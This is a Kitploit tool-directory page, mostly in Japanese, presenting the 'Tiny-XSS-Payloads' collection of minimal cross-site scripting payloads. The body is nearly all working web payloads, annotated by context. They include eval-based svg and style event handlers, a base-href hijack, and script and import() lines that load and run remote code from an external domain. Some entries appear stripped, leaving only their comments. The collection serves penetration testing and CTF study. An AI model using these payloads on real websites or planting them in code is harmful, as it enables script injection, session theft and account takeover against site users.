Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Tiny-XSS-Payloads — さまざまなコンテキストで使用できる小さなXSSペイロードのコレクション。 https://tinyxss.terjanq.me | Kitploit
ツール/GitHubGitHub/terjanq/tiny-xss-payloads
ペイロード生成ウェブセキュリティCTF厳選リソース
GitHubterjanq/tiny-xss-payloads

Tiny-XSS-Payloads

さまざまなコンテキストで使用できる小さなXSSペイロードのコレクション。 https://tinyxss.terjanq.me

リポジトリを見るウェブサイト
2.4k218571年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Tiny-XSS-Payloads

さまざまなコンテキストで使用できる短いXSSペイロードのコレクションです。

デモはこちら: https://tinyxss.terjanq.me

現在のペイロード

<!-- Requires a relative script inserted to the DOM after the sink, 
  e.g. <base/href=//NJ.₨> ... <script src=/aaa></script> -->
<base/href=//NJ.₨>
<!-- Only works as reflected XSS -->
<svg/onload=eval(name)>
<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>
<!-- If you control the name, but unsafe-eval not enabled -->
<svg/onload=location=name>
<!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM -->
<svg><svg/onload=eval(name)>
<!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<audio/src/onerror=eval(name)>
<!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->

<!-- Just a casual script -->
<script/src=//NJ.₨></script>
<!-- If you control the name of the window -->

<!-- If you control the URL -->

<!-- If number of iframes on the page is constant -->

<!-- for Firefox only -->
<script/href=//NJ.₨ />">
<!-- If number of iframes on the page is random -->

<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
</script>">
<!-- If inline styles are allowed -->
<style/onload=eval(name)>
<!-- If inline styles are allowed and the URL can be controlled -->
<style/onload=eval(`'`+URL)>
<!-- If inline styles are blocked -->
<style/onerror=eval(name)>
<!-- Uses external script as import, doesn't work in innerHTML -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<svg/onload=import(/\\NJ.₨/)>
<!-- Uses external script as import,  triggers if inline styles are allowed.
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<style/onload=import(/\\NJ.₨/)>
<!-- Uses external script as import -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->

非推奨:

<!-- If you control the URL, Safari-only -->

<!-- If inline styles are allowed, Safari only -->
<style/onload=write(URL)>
ツールをダウンロード